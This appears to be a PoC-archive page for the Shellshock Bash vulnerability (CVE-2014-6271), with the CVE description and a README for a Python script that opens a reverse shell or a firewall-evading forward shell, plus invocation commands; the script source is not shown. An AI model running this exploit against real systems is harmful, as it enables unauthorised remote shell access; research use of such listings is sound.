Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
CVE-2014-6271 Shellshock
Readme
# CVE-2014-6271 Shellshock

A python3 script for the CVE-2014-6271 Shellshock exploit that creates a reverse shell or a pseudo interactive shell using mkfifo for firewall evasion

## Getting Started

### Executing program

* With python3
```
python3 shellshock.py -t http://exploitshellshock.blah -lhost 127.0.0.1 -lport 9001
```
* For forward shell firewall evasion
```
python3 shellshock.py -t http://exploitshellshock.blah -fs
```

## Help

For help menu:
```
python3 shellshock.py -h
```

## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
File Snapshot

[4.0K] /data/pocs/536f4b1d3697550364c59ca97beb7aaea52304d4 ├── [ 982] README.md └── [3.9K] shellshock.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →